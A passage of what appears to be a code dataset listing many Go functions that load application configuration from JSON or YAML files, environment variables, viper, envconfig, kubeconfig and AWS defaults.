false\n\t}\n\n\tdebug, err := strconv.ParseBool(os.Getenv(\"DEBUG\"))\n\tif err != nil {\n\t\tinsecure = false\n\t}\n\n\tttlThreshold, err := strconv.ParseInt(os.Getenv(\"TTL_THRESHOLD\"), 10, 64)\n\tif err != nil {\n\t\tttlThreshold = 15206400 // ~6 months\n\t}\n\n\tttlIncrement, err := strconv.ParseInt(os.Getenv(\"TTL_INCREMENT\"), 10, 64)\n\tif err != nil {\n\t\tttlIncrement = 5184000 // 60 days\n\t}\n\n\t// get relevant environment variables\n\tcfg.VaultAddress = os.Getenv(\"VAULT_ADDRESS\")\n\tcfg.ConfigFilePath = os.Getenv(\"CONFIG_FILE_PATH\")\n\tcfg.SlackWebhookURL = os.Getenv(\"SLACK_WEBHOOK_URL\")\n\tcfg.Insecure = insecure // defaults to false\n\tcfg.Debug = debug // defaults to false\n\tcfg.TTLThreshold = ttlThreshold\n\tcfg.TTLIncrement = ttlIncrement\n\treturn &cfg, nil\n}", "func getConfig() (*config, error) {\n\tret := &config{}\n\tif err := c.Load(ret); err != nil {\n\t\treturn nil, err\n\t}\n\treturn ret, nil\n}", "func Get() *Config {\n\n\t// Load config the first time\n\tif configCache == nil {\n\t\tconf, err := loadConfigFromFile(configFilePath)\n\t\tif err != nil {\n\t\t\tlog.Fatalf(\"error: %v\", err)\n\t\t}\n\t\tconfigCache = conf\n\t}\n\n\treturn configCache\n}", "func (k *HelmChart) GetConfig() *config.Config {\n\treturn k.env.config\n}", "func getConfig(envVars []string) (value string) {\n\tvalue = \"\"\n\tfor _, v := range envVars {\n\t\tvalue = os.Getenv(v)\n\t\tif value != \"\" {\n\t\t\tbreak\n\t\t}\n\t}\n\treturn\n}", "func getConfigFile() ([]byte, error) {\n\tif len(configFile) != 0 {\n\t\treturn configFile, nil\n\t}\n\tenvConf := os.Getenv(\"IGOR_CONFIG\")\n\tif envConf != \"\" {\n\t\treturn []byte(envConf), nil\n\t}\n\tfilename, _ := filepath.Abs(\"./config.json\")\n\tif _, err := os.Stat(filename); err != nil {\n\t\tjsonConfig = false\n\t\tfilename, _ = filepath.Abs(\"./config.yml\")\n\t}\n\tconfigFile, err := ioutil.ReadFile(filename)\n\n\tif err != nil {\n\t\treturn configFile, err\n\t}\n\treturn configFile, nil\n}", "func GetConfig() Configuration{\n\tcurrentPath := files.GetCurrentDirectory()\n\tjsonFile, err := os.Open(currentPath + \"/config.json\")\n\tif err != nil {\n\t\tfmt.Println(err)\n\t}\n\tfmt.Println(currentPath)\n\tdefer jsonFile.Close()\n\tbyteValue, _ := ioutil.ReadAll(jsonFile)\n\tvar configuration Configuration\n\tjson.Unmarshal(byteValue, &configuration)\n\treturn configuration\n}", "func getConfigFile() (*os.File, error) {\n\treturn os.Open(env.WorkDir() + \"/configs/config.json\")\n}", "func (c *ConfigService) Get() (*Config, *http.Response, error) {\n\tconfig := new(Config)\n\tapiError := new(APIError)\n\tresp, err := c.sling.New().Get(\"configuration.json\").Receive(config, apiError)\n\treturn config, resp, relevantError(err, *apiError)\n}", "func GetConfig() (config *Config) {\n\tpwd, _ := os.Getwd()\n\tpath := path.Join(pwd, \"config.json\")\n\tconfigFile, err := os.Open(path)\n\tdefer configFile.Close()\n\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tjsonParser := json.NewDecoder(configFile)\n\tif err = jsonParser.Decode(&config); err != nil {\n\t\tpanic(err)\n\t}\n\n\treturn\n}", "func GetConfig() (config *Config) {\n\tpwd, _ := os.Getwd()\n\tpath := path.Join(pwd, \"config.json\")\n\tconfigFile, err := os.Open(path)\n\tdefer configFile.Close()\n\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\tjsonParser := json.NewDecoder(configFile)\n\tif err = jsonParser.Decode(&config); err != nil {\n\t\tpanic(err)\n\t}\n\n\treturn\n}", "func getConfig(configFile string) {\n\tvar err error\n\tvar input = io.ReadCloser(os.Stdin)\n\tif input, err = os.Open(configFile); err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\tdefer input.Close()\n\n\t// Read the config file\n\tyamlBytes, err := ioutil.ReadAll(input)\n\n\tif err != nil {\n\t\tlog.Fatalln(err)\n\t}\n\n\t// Parse the config\n\tif err := yaml.Unmarshal(yamlBytes, &config); err != nil {\n\t\t//log.Fatalf(\"Content: %v\", yamlBytes)\n\t\tlog.Fatalf(\"Could not parse %q: %v\", configFile, err)\n\t}\n}", "func GetConfig() Config {\n\terr := godotenv.Load()\n\tif err != nil {\n\t\tlog.Fatal(\"Error loading .env file\")\n\t}\n\n\tconfig := Config{}\n\terr = env.Parse(&config)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t}\n\n\treturn config\n}", "func (cp configFactory) getConfig(app *model.App, vmConfig vm.Config, remoteConfig *remote.Config, forceOpts forceOptions,\n\toverrideCP func(env string) (kubeClient, error)) (*config, error) {\n\tscp := &stdClientProvider{\n\t\tapp: app,\n\t\tconfig: remoteConfig,\n\t\tverbosity: cp.verbosity,\n\t\tforceContext: forceOpts.k8sContext,\n\t\toverrideClientProvider: overrideCP,\n\t}\n\treturn cp.internalConfig(app, vmConfig, scp.Client, scp.Attrs)\n}", "func GetConfig(mode string) Configuration {\n var ret Configuration\n \n // Anthing other than \"prod\" results in test env\n if (mode == \"prod\") {\n // Set defaults for prod\n ret.Username = os.Getenv(\"nameuser\")\n ret.Token = os.Getenv(\"nametoken\")\n ret.BaseURL = \"https://api.name.com/v4\"\n ret.Debug = false\n } else {\n // Set defaults for test\n ret.Username = os.Getenv(\"nametestuser\")\n ret.Token = os.Getenv(\"nametesttoken\")\n ret.BaseURL = \"https://api.dev.name.com/v4\"\n ret.Debug = true\n }\n \n return ret\n}", "func GetConfig() *Config {\n\tif conf != nil {\n\t\treturn conf\n\t}\n\tv := viper.New()\n\tv.AutomaticEnv()\n\tv.SetEnvKeyReplacer(strings.NewReplacer(\".\", \"_\"))\n\n\tfmt.Println(v.Get(\"cache.host\"))\n\tfmt.Println(v.Get(\"cache_host\"))\n\n\tcacheConf := cacheConfig{\n\t\tHost: v.GetString(\"cache.host\"),\n\t\tPoolSize: v.GetInt(\"cache.poolsize\"),\n\t}\n\n\tlogConf := logConfig{\n\t\tLogFile: v.GetString(\"log.file\"),\n\t\tLogLevel: v.GetString(\"log.level\"),\n\t}\n\n\thttpConf := httpConfig{\n\t\tHostPort: v.GetString(\"http.host\"),\n\t}\n\teslConf := eslConfig{\n\t\tHost: v.GetString(\"esl.host\"),\n\t\tPort: uint(v.GetInt(\"esl.port\")),\n\t\tPassword: v.GetString(\"esl.password\"),\n\t\tTimeout: v.GetInt(\"esl.timeout\"),\n\t}\n\t\n\tdbConf := dbConfig{\n\t\tDbName : v.GetString(\"db.name\"),\n\t\tDbUserName : v.GetString(\"db.username\"),\n\t\tDbHost : v.GetString(\"db.host\"),\n\t\tDbPort : v.GetInt(\"db.port\"),\n\t\tDbPassword : v.GetString(\"db.password\"),\n\t}\n\t\n\t\n\tconf = &Config{\n\t\tCache: cacheConf,\n\t\tLog: \tlogConf,\n\t\tHttpConfig: httpConf,\n\t\tEslConfig: eslConf,\n\t\tDBConfig:dbConf,\n\t}\n\treturn conf\n}", "func Get() *Config {\n\treturn config\n}", "func GetConfig(key string) string {\n\tconfig := make(map[string]string)\n\tb, err := ioutil.ReadFile(\"config.json\")\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tjson.Unmarshal(b, &config)\n\treturn config[key]\n}", "func GetConfig() Config {\n\tvar config Config\n\tfile := \"./config.json\"\n\tconfigFile, err := os.Open(file)\n\tif err != nil {\n\t\tfmt.Println(err.Error())\n\t}\n\tdefer configFile.Close()\n\tjsonParser := json.NewDecoder(configFile)\n\tjsonParser.Decode(&config)\n\tCreateDir(config.DataDir)\n\treturn config\n}", "func GetConfig(filePath string) (*Config, error) {\n\tconfig := Config{}\n\tfile, err := os.Open(filePath)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tdefer file.Close()\n\tdecoder := json.NewDecoder(file)\n\terr = decoder.Decode(&config)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn &config, nil\n}", "func GetConfig() Config {\n\tif !loaded {\n\t\tbyteData, err := ioutil.ReadFile(\"config.json\")\n\t\tif err != nil {\n\t\t\tlog.Fatal(err)\n\t\t}\n\n\t\tjson.Unmarshal(byteData, &config)\n\t\tloaded = true\n\t}\n\treturn config\n}", "func Get() (*Config, error) {\n\tif cfg != nil {\n\t\treturn cfg, nil\n\t}\n\n\tcfg = getDefaultConfig()\n\n\tif err := envconfig.Process(\"\", cfg); err != nil {\n\t\treturn cfg, err\n\t}\n\n\tcfg.ServiceAuthToken = \"Bearer \" + cfg.ServiceAuthToken\n\n\tif errs := cfg.KafkaConfig.validateKafkaValues(); len(errs) != 0 {\n\t\treturn nil, fmt.Errorf(\"kafka config validation errors: %v\", strings.Join(errs, \", \"))\n\t}\n\n\treturn cfg, nil\n}", "func (c Config) GetConfigFile() string {\n\treturn c.viper.GetString(configFile)\n}", "func GetConfig(filename string) Config {\n\tconfig := Config{}\n\n\tdata, err := ioutil.ReadFile(filename)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\terr = json.Unmarshal(data, &config)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\n\treturn config\n}", "func Get() (*Configuration, error) {\n\tif cfg != nil {\n\t\treturn cfg, nil\n\t}\n\n\tcfg = &Configuration{\n\t\tBindAddr: \":10100\",\n\t\tDefaultMaxResults: 1000,\n\t\tGracefulShutdownTimeout: 5 * time.Second,\n\t\tHost: \"http://localhost\",\n\t\tElasticSearchConfig: &ElasticSearchConfig{\n\t\t\tDestURL: \"http://localhost:9200\",\n\t\t\tDestIndex: \"courses\",\n\t\t\tShowScore: false,\n\t\t\tSignedRequests: true,\n\t\t},\n\t}\n\n\treturn cfg, envconfig.Process(\"\", cfg)\n}", "func GetConfig(configFile string) (*viper.Viper, error) {\n\ts, err := os.Stat(configFile)\n\tif os.IsNotExist(err) {\n\t\treturn nil, err\n\t}\n\tif s.IsDir() {\n\t\treturn nil, errors.New(\"Config file is not a file\")\n\t}\n\tc := viper.New()\n\tdir := filepath.Dir(configFile)\n\tc.SetConfigName(strings.TrimSuffix(filepath.Base(configFile), filepath.Ext(configFile)))\n\tc.SetConfigType(\"json\")\n\tc.AddConfigPath(dir)\n\terr = c.ReadInConfig()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\treturn c, nil\n}", "func Get() Config {\n\treturn conf\n}", "func (k *FileKeystore) GetConfig() (*common.Config, error) {\n\tk.RLock()\n\tdefer k.RUnlock()\n\n\tconfigHash := make(map[string]interface{})\n\tfor key, secret := range k.secrets {\n\t\tconfigHash[key] = string(secret.Value)\n\t}\n\n\treturn common.NewConfigFrom(configHash)\n}", "func Get() *Configuration {\n\tvar config Configuration\n\terr := envconfig.Process(\"linotte\", &config)\n\tif err != nil {\n\t\tlog.Fatal(err.Error())\n\t}\n\treturn &config\n}", "func getConfig(serverURL, kubeconfig string) (*rest.Config, error) {\n\tif kubeconfig == \"\" {\n\t\tkubeconfig = os.Getenv(\"KUBECONFIG\")\n\t}\n\t// If we have an explicit indication of where the kubernetes config lives, read that.\n\tif kubeconfig != \"\" {\n\t\treturn clientcmd.BuildConfigFromFlags(serverURL, kubeconfig)\n\t}\n\t// If not, try the in-cluster config.\n\tif c, err := rest.InClusterConfig(); err == nil {\n\t\treturn c, nil\n\t}\n\t// If no in-cluster config, try the default location in the user's home directory.\n\tif usr, err := user.Current(); err == nil {\n\t\tif c, err := clientcmd.BuildConfigFromFlags(\"\", filepath.Join(usr.HomeDir, \".kube\", \"config\")); err == nil {\n\t\t\treturn c, nil\n\t\t}\n\t}\n\n\treturn nil, fmt.Errorf(\"could not create a valid kubeconfig\")\n}", "func getConfig(path string) (*config, error) {\n\tf, err := ioutil.ReadFile(path)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tcfg := &config{}\n\tif err := yaml.Unmarshal(f, &cfg); err != nil {\n\t\treturn nil, err\n\t}\n\tfmt.Println(cfg)\n\n\treturn cfg, nil\n\n}", "func GetConfig(filePath string) (*Configuration, error) {\n\tpath, _ := filepath.Abs(filePath)\n\tfile, err := os.Open(path)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tconfig := Configuration{}\n\tdecoder := json.NewDecoder(file)\n\terr = decoder.Decode(&config)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tconfig.processConfig()\n\n\treturn &config, nil\n}", "func Get() Cfg {\n\treturn conf\n}", "func Get() *Config {\n\treturn &config\n}", "func Get() *Config {\n\treturn &config\n}", "func getconfig(c *cli.Context) (result Config, err error) {\n\tif result, err = NewConfigFromFilename(c.String(\"config\")); err != nil {\n\t\terr = exitError(\"Config returned error: %s\", err)\n\t\treturn\n\t}\n\t// validate configuration\n\tif err = result.Validate(); err != nil {\n\t\terr = exitError(\"Config returned error: %s\", err)\n\t\treturn\n\t}\n\treturn\n}", "func GetConfiguration(env *string) (conf *config.Config) {\n\tconf = &config.Config{}\n\terr := yaml.Unmarshal(readFromFile(env), &conf)\n\tif err != nil {\n\t\tpanic(fmt.Sprintf(\"error: %v\", err))\n\t}\n\treturn\n}", "func GetConfig(f string) (*Configs, error) {\n\tconfig := &Configs{}\n\tfile, err := os.ReadFile(f)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\terr = GetYaml(file, config)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn config, nil\n}", "func (t *GolangDockerfileGenerator) GetConfig() (transformertypes.Transformer, *environment.Environment) {\n\treturn t.Config, t.Env\n}", "func (s *Service) getConfig(c echo.Context) error {\n\t// Get the config\n\tconf, err := s.datastore.GetConfig(c.Param(\"config_id\"))\n\tif err != nil {\n\t\t// Not found\n\t\tif errors.Is(err, shipyard.ErrNotFound) {\n\t\t\treturn echo.NewHTTPError(http.StatusNotFound, \"Requested resource was not found\")\n\t\t}\n\n\t\t// Other errors\n\t\ts.logger.Errorf(\"echo/getConfig get config: %s\")\n\t\treturn echo.NewHTTPError(http.StatusInternalServerError, \"Failed to get Config\")\n\t}\n\n\treturn c.JSON(http.StatusOK, conf)\n}", "func (p *Plugin) getConfig(ctx context.Context, req *request) (*drone.Config, error) {\n\tlogrus.WithFields(logrus.Fields{\n\t\t\"after\": req.Build.After,\n\t\t\"before\": req.Build.Before,\n\t\t\"branch\": req.Repo.Branch,\n\t\t\"ref\": req.Build.Ref,\n\t\t\"slug\": req.Repo.Slug,\n\t\t\"trigger\": req.Build.Trigger,\n\t}).Debugf(\"drone-tree-config environment\")\n\n\t// check cache first, when enabled\n\tck := newCacheKey(req)\n\tif p.cacheTTL > 0 {\n\t\tif cached, exists := p.cache.retrieve(req.UUID, ck); exists {\n\t\t\tif cached != nil {\n\t\t\t\treturn &drone.Config{Data: cached.config}, cached.error\n\t\t\t}\n\t\t}\n\t}\n\n\t// fetch the config data. cache it, when enabled\n\treturn p.cacheAndReturn(\n\t\treq.UUID, ck,\n\t\tnewCacheEntry(\n\t\t\tp.getConfigData(ctx, req),\n\t\t),\n\t)\n}", "func getConfig() (*config, error) {\n\tret := new(config)\n\tif err := conf.Load(ret); err != nil {\n\t\treturn nil, err\n\t}\n\treturn ret, nil\n}", "func Get() Config {\n\tif cfgPresent {\n\t\treturn cfg\n\t}\n\n\tif isTesting() {\n\t\tloadTestConfig()\n\t} else {\n\t\tloadConfig()\n\t}\n\n\tcfgPresent = true\n\n\treturn cfg\n}", "func GetConfig() *Config {\n\tgithubRef := os.Getenv(\"GH_REF\")\n\tgithubRepo := os.Getenv(\"GH_REPO\")\n\ttoken := os.Getenv(\"GH_TOKEN\")\n\tdockerRepo := os.Getenv(\"DOCKER_REPO\")\n\tdockerTag := os.Getenv(\"DOCKER_TAG\")\n\n\tworkflowID := os.Getenv(\"GH_WORKFLOW\")\n\n\tcfg := &Config{\n\t\tGithubRef: githubRef,\n\t\tGithubRepo: githubRepo,\n\t\tGithubToken: token,\n\t\tGithubWorkflowID: workflowID,\n\t\tDockerRepo: dockerRepo,\n\t\tDockerTag: dockerTag,\n\t}\n\n\treturn cfg\n}", "func GetConfig() *Config {\n\terr := godotenv.Load()\n\tif err != nil {\n\t\tlog.Printf(\".env file not found\")\n\t}\n\n\tlogModeStr := os.Getenv(\"DB_LOG\")\n\n\tlogMode := false\n\n\tif b, err := strconv.ParseBool(logModeStr); err == nil {\n\t\tlogMode = b\n\t}\n\n\tconfig := &Config{\n\t\tDB: &DBConfig{\n\t\t\tUsername: os.Getenv(\"DB_USERNAME\"),\n\t\t\tPassword: os.Getenv(\"DB_PASSWORD\"),\n\t\t\tDbname: os.Getenv(\"DB_NAME\"),\n\t\t\tHost: os.Getenv(\"DB_HOST\"),\n\t\t\tLogMode: logMode,\n\t\t},\n\t\tInterface: os.Getenv(\"INTERFACE\"),\n\t\tPort: os.Getenv(\"PORT\"),\n\t}\n\n\t// check if interface given, use localhost as default\n\tif len(config.Interface) == 0 {\n\t\tconfig.Interface = \"127.0.0.1\"\n\t}\n\n\t// check if port given, use 3000 as default\n\tif len(config.Port) == 0 {\n\t\tconfig.Port = \"3000\"\n\t}\n\n\treturn config\n}", "func getConf(configFile string) (configuration, error) {\n\tfile, _ := os.Open(configFile)\n\tdefer file.Close()\n\n\tdecoder := json.NewDecoder(file)\n\tConf := configuration{}\n\terr := decoder.Decode(&Conf)\n\n\t// in case of err Conf will be empty struct\n\treturn Conf, err\n\n}", "func GetConfig(filePath string) (Config, error) {\n\traw, err := ioutil.ReadFile(filePath)\n\n\tvar config Config\n\terr = json.Unmarshal(raw, &config)\n\n\treturn config, err\n}", "func GetConfig(f string) (*Configs, error) {\n\tconfig := &Configs{}\n\tfile, err := ioutil.ReadFile(f)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\terr = GetYaml(file, config)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\treturn config, nil\n}", "func GetConfig() *viper.Viper {\n\treturn config\n}", "func GetConfiguration() (Configuration, error) {\n\n\tconfigYaml := &Configuration{}\n\tvar err error\n\tvar confFile []byte\n\n\t// check if conf-file is .yaml or .json\n\tconfFile, err = ioutil.ReadFile(\"conf.yaml\")\n\tif err != nil {\n\t\tconfFile, err = ioutil.ReadFile(\"conf.json\")\n\t\tif err != nil {\n\t\t\tlog.Println(\"Could not open conf.yaml or conf.json\")\n\t\t}\n\t}\n\n\t//if file exists use its variables\n\tif err == nil {\n\t\terr = yaml.Unmarshal(confFile, &configYaml)\n\t\tif err != nil {\n\t\t\treturn Configuration{}, err\n\t\t}\n\t}\n\n\t//Search for OS environment and use conf-file as fallback\n\tconfig := Configuration{}\n\tconfig.Port = GetEnv(\"PORT\", configYaml.Port)\n\tconfig.APIKey = GetEnv(\"APIKEY\", configYaml.APIKey)\n\tconfig.SMTPServer.Host = GetEnv(\"SMTP_HOST\", configYaml.SMTPServer.Host)\n\tconfig.SMTPServer.Port = GetEnv(\"SMTP_PORT\", configYaml.SMTPServer.Port)\n\tconfig.SMTPServer.SenderEmail = GetEnv(\"SMTP_SENDER_EMAIL\", configYaml.SMTPServer.SenderEmail)\n\tconfig.SMTPServer.SenderPassword = GetEnv(\"SMTP_SENDER_PASSWORD\", configYaml.SMTPServer.SenderPassword)\n\tconfig.Kafka.Server = GetEnv(\"KAFKA_SERVER\", configYaml.Kafka.Server)\n\tconfig.Kafka.Group = GetEnv(\"KAFKA_GROUP\", configYaml.Kafka.Group)\n\n\treturn config, nil\n}", "func GetConfig() Config {\n\tif value, ok := os.LookupEnv(\"APP_DEBUG\"); ok {\n\t\tvalue = strings.Trim(value, \" \\r\\n\")\n\t\tvalue = strings.ToLower(value)\n\t\tif value == \"true\" {\n\t\t\tconfig.Debug = true\n\t\t} else {\n\t\t\tgin.SetMode(gin.ReleaseMode)\n\t\t}\n\t}\n\n\tif value, ok := os.LookupEnv(\"GEO_IP_DB_PATH\"); ok {\n\t\tvalue = strings.Trim(value, \" \\r\\n\")\n\t\tconfig.GeoIP.DBPath = value\n\t} else {\n\t\t// log.Fatalln(\"GEO_IP_DB_PATH is not set\")\n\t}\n\n\tif value, ok := os.LookupEnv(\"REQUEST_ID_LENGTH\"); ok {\n\t\tif length, err := strconv.Atoi(value); err == nil {\n\t\t\tconfig.RequestID.Length = length\n\t\t}\n\t}\n\n\treturn config\n}", "func getConfig() (aws.Config, error) {\n\tif os.Getenv(\"AWS_REGION\") == \"\" {\n\t\treturn aws.Config{}, errors.New(\"AWS_REGION is not set\")\n\t}\n\tcfg, err := config.LoadDefaultConfig(context.TODO())\n\tif err != nil {\n\t\treturn aws.Config{}, err\n\t}\n\treturn cfg, nil\n}", "func GetConfig() (map[string]string, error) {\n\tdata, err := download(GcpConfigFileName)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\tvar config map[string]string\n\terr = json.Unmarshal(data, &config)\n\treturn config, err\n}", "func getConfig(cfgFile string, pCfg *ContivConfig) error {\n\tbytes, err := ioutil.ReadFile(cfgFile)\n\tif err != nil {\n\t\treturn err\n\t}\n\n\tpCfg.SvcSubnet = defSvcSubnet\n\terr = json.Unmarshal(bytes, pCfg)\n\tif err != nil {\n\t\treturn fmt.Errorf(\"Error parsing config file: %s\", err)\n\t}\n\n\treturn nil\n}", "func GetConfig(fileName string) (*MatterwickConfig, error) {\n\tconfig := &MatterwickConfig{}\n\tfileName = findConfigFile(fileName)\n\n\tfile, err := os.Open(fileName)\n\tif err != nil {\n\t\treturn config, errors.Wrap(err, \"unable to open config file\")\n\t}\n\n\tdecoder := json.NewDecoder(file)\n\terr = decoder.Decode(config)\n\tif err != nil {\n\t\treturn config, errors.Wrap(err, \"unable to decode config file\")\n\t}\n\n\treturn config, nil\n}", "func Get() *Config {\n\tif c == nil {\n\t\tInit(\"\")\n\t}\n\n\treturn c\n}", "func (app *Application) GetConfig() *Config {\n return app.config\n}", "func Get() Config {\n\treturn _conf\n}", "func Get(variable string) string {\n\n\tvar config = map[string]Options{\n\t\t\"EnvAPIPort\": {\n\t\t\tDefault: DefaultAPIPort,\n\t\t\tEnvironment: EnvAPIPort,\n\t\t},\n\t\t\"EnvAPIIP\": {\n\t\t\tDefault: DefaultAPIIP,\n\t\t\tEnvironment: EnvAPIIP,\n\t\t},\n\t\t\"EnvBasicAuth\": {\n\t\t\tDefault: strconv.FormatBool(DefaultBasicAuthentication),\n\t\t\tEnvironment: EnvBasicAuth,\n\t\t},\n\t\t\"EnvDefaultConsulAddr\": {\n\t\t\tDefault: structs.DefaultConsulAddr,\n\t\t\tEnvironment: EnvConsulAddr,\n\t\t},\n\t\t\"EnvDatabasePath\": {\n\t\t\tDefault: structs.DefaultDatabasePath,\n\t\t\tEnvironment: EnvDatabasePath,\n\t\t},\n\t}\n\n\tfor k, v := range config {\n\t\tif k == variable {\n\t\t\tif os.Getenv(v.Environment) != \"\" {\n\t\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\t\"key\": k,\n\t\t\t\t\t\"value\": v.Environment,\n\t\t\t\t}).Debug(\"config: setting configuration\")\n\t\t\t\treturn os.Getenv(v.Environment)\n\t\t\t}\n\t\t\tlog.WithFields(log.Fields{\n\t\t\t\t\"key\": k,\n\t\t\t\t\"value\": v.Default,\n\t\t\t}).Debug(\"config: setting configuration\")\n\t\t\treturn v.Default\n\n\t\t}\n\t}\n\treturn \"\"\n}", "func (r *Runtime) getConfig(cfg *Config) (*Config, error) {\n\tctx, cancel := context.WithTimeout(context.Background(), r.requestTimeout)\n\tdefer cancel()\n\tresp, err := r.apisvc.GetInfo(ctx, &rktapi.GetInfoRequest{})\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\tflags := resp.Info.GlobalFlags\n\n\tif flags.Dir != \"\" {\n\t\tcfg.Dir = flags.Dir\n\t}\n\tif flags.LocalConfigDir != \"\" {\n\t\tcfg.LocalConfigDir = flags.LocalConfigDir\n\t}\n\tif flags.UserConfigDir != \"\" {\n\t\tcfg.UserConfigDir = flags.UserConfigDir\n\t}\n\tif flags.SystemConfigDir != \"\" {\n\t\tcfg.SystemConfigDir = flags.SystemConfigDir\n\t}\n\tif flags.InsecureFlags != \"\" {\n\t\tcfg.InsecureOptions = fmt.Sprintf(\"%s,%s\", cfg.InsecureOptions, flags.InsecureFlags)\n\t}\n\n\treturn cfg, nil\n}", "func (crc *CommandsRunnerClient) GetConfig(extensionName string) (string, error) {\n\turl := \"config\"\n\tif extensionName != \"\" {\n\t\turl += \"?extension-name=\" + extensionName\n\t}\n\t//Call the rest API\n\tdata, errCode, err := crc.RestCall(http.MethodGet, global.BaseURL, url, nil, nil)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tif errCode != http.StatusOK {\n\t\treturn \"\", errors.New(\"Unable to get config: \" + data + \",please check logs\")\n\t}\n\t//Convert to text otherwize return the json\n\tif crc.OutputFormat == \"text\" {\n\t\t//\tvar configAux config.Config\n\t\tcfg, jsonErr := config.ParseJson(data)\n\t\tif jsonErr != nil {\n\t\t\tfmt.Println(jsonErr.Error())\n\t\t\treturn \"\", jsonErr\n\t\t}\n\t\tps, jsonErr := cfg.Map(global.ConfigRootKey)\n\t\t//\t\tjsonErr = json.Unmarshal([]byte(data), &configAux)\n\t\tif jsonErr != nil {\n\t\t\tfmt.Println(jsonErr.Error())\n\t\t\treturn \"\", jsonErr\n\t\t}\n\t\tout := \"\"\n\t\tfor k, v := range ps {\n\t\t\tout += fmt.Sprintf(\"=>\\n\")\n\t\t\tout += fmt.Sprintf(\"Name : %s\\n\", k)\n\t\t\tout += fmt.Sprintf(\"Value : %s\\n\", v)\n\t\t}\n\t\treturn out, nil\n\t}\n\treturn crc.convertJSONOrYAML(data)\n}", "func GetConfig() (Config, error) {\n\tvar cfg Config\n\terr := envdecode.StrictDecode(&cfg)\n\treturn cfg, err\n}", "func getConf() *config {\n\tviper.AddConfigPath(\".\")\n\tviper.SetConfigName(\"config\")\n\terr := viper.ReadInConfig()\n\n\tif err != nil {\n\t\tfmt.Printf(\"%v\", err)\n\t}\n\n\tconf := &config{}\n\terr = viper.Unmarshal(conf)\n\tif err != nil {\n\t\tfmt.Printf(\"unable to decode into config struct, %v\", err)\n\t}\n\n\tsd := conf.SearchDirectory\n\n\tif len(sd) == 0 {\n\t\tpanic(\"Please set a `searchDirectory` in config.yml\")\n\t}\n\n\tconf.SearchDirectory = appendTrailingSlashIfNotExist(conf.SearchDirectory)\n\tconf.RemotePath = appendTrailingSlashIfNotExist(conf.RemotePath)\n\tconf.RemoteOldPath = appendTrailingSlashIfNotExist(conf.RemoteOldPath)\n\n\treturn conf\n}", "func getConfig() (aws.Config, error) {\n\tif os.Getenv(\"AWS_REGION\") == \"\" {\n\t\treturn aws.Config{}, errors.New(\"AWS_REGION is not set\")\n\t}\n\n\tvar cfg aws.Config\n\tvar err error\n\n\tif awsEndpoint := os.Getenv(\"CUSTOM_AWS_ENDPOINT_URL\"); awsEndpoint != \"\" {\n\t\tcustomResolver := aws.EndpointResolverWithOptionsFunc(func(service, region string, options ...interface{}) (aws.Endpoint, error) {\n\t\t\treturn aws.Endpoint{\n\t\t\t\tPartitionID: \"aws\",\n\t\t\t\tURL: awsEndpoint,\n\t\t\t}, nil\n\t\t})\n\n\t\tcfg, err = config.LoadDefaultConfig(\n\t\t\tcontext.TODO(),\n\t\t\tconfig.WithEndpointResolverWithOptions(customResolver))\n\t} else {\n\t\tcfg, err = config.LoadDefaultConfig(context.TODO())\n\t}\n\n\tif err != nil {\n\t\treturn aws.Config{}, err\n\t}\n\treturn cfg, nil\n}", "func configRetriever(c *cli.Context) error {\n\tcfg := config.FromEnv()\n\n\tc.Context = context.WithValue(c.Context, config.Key(), cfg)\n\n\treturn nil\n}", "func GetConfig() (*Config, error) {\n\tvar config Config\n\tviper.SetConfigName(\".config\") // name of config file (without extension)\n\tviper.AddConfigPath(\".\") // path to look for the config file in\n\terr := viper.ReadInConfig() // Find and read the Config file\n\tif err != nil { // Handle errors reading the Config file\n\t\tpanic(fmt.Sprint(\"fatal error Config file: %w \\n\", err))\n\t}\n\n\terr = viper.Unmarshal(&config)\n\tif err != nil {\n\t\tlog.Fatalf(\"unable to decode into struct, %v\", err)\n\t}\n\tif config.Environment == \"\" {\n\t\tlog.Fatalf(\"environment not set\")\n\t}\n\n\treturn &config, nil\n}", "func Get() *Config {\n\treturn configuration\n}", "func Get(key string) interface{} {\n\treturn DefaultConf.ConfigFactory.GetConfigurationByKey(key)\n}", "func GetConfig() (*Config, error) {\n\tconf := new(Config)\n\n\tvar agent, ifaces, configfile string\n\n\tflag.StringVarP(&agent, \"agent\", \"a\", \"\", \"Agent address\")\n\tflag.StringVarP(&ifaces, \"interfaces\", \"i\", \"\", \"Interfaces to listen on, comma-separated (default: all)\")\n\tflag.StringVarP(&configfile, \"config-file\", \"c\", \"\", \"Config file to read (default: none)\")\n\tflag.Parse()\n\n\t// Config file is parsed first, other command-line options will override its values\n\tif configfile != \"\" {\n\t\tif err := conf.ParseConfigFile(configfile); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\tif agent != \"\" {\n\t\tconf.Agent = agent\n\t}\n\n\tif ifaces != \"\" {\n\t\tconf.Interfaces = strings.Split(ifaces, \",\")\n\t}\n\n\treturn conf, nil\n}", "func GetConfig() Config {\n\tport, ok := os.LookupEnv(\"PORT\")\n\tif !ok {\n\t\tport = \"8080\"\n\t}\n\n\tenv, ok := os.LookupEnv(\"ENV\")\n\tif !ok {\n\t\tenv = \"development\"\n\t}\n\n\tpgHost, ok := os.LookupEnv(\"PG_HOST\")\n\tif !ok {\n\t\tpgHost = \"localhost\"\n\t}\n\n\tpgPort, ok := os.LookupEnv(\"PG_PORT\")\n\tif !ok 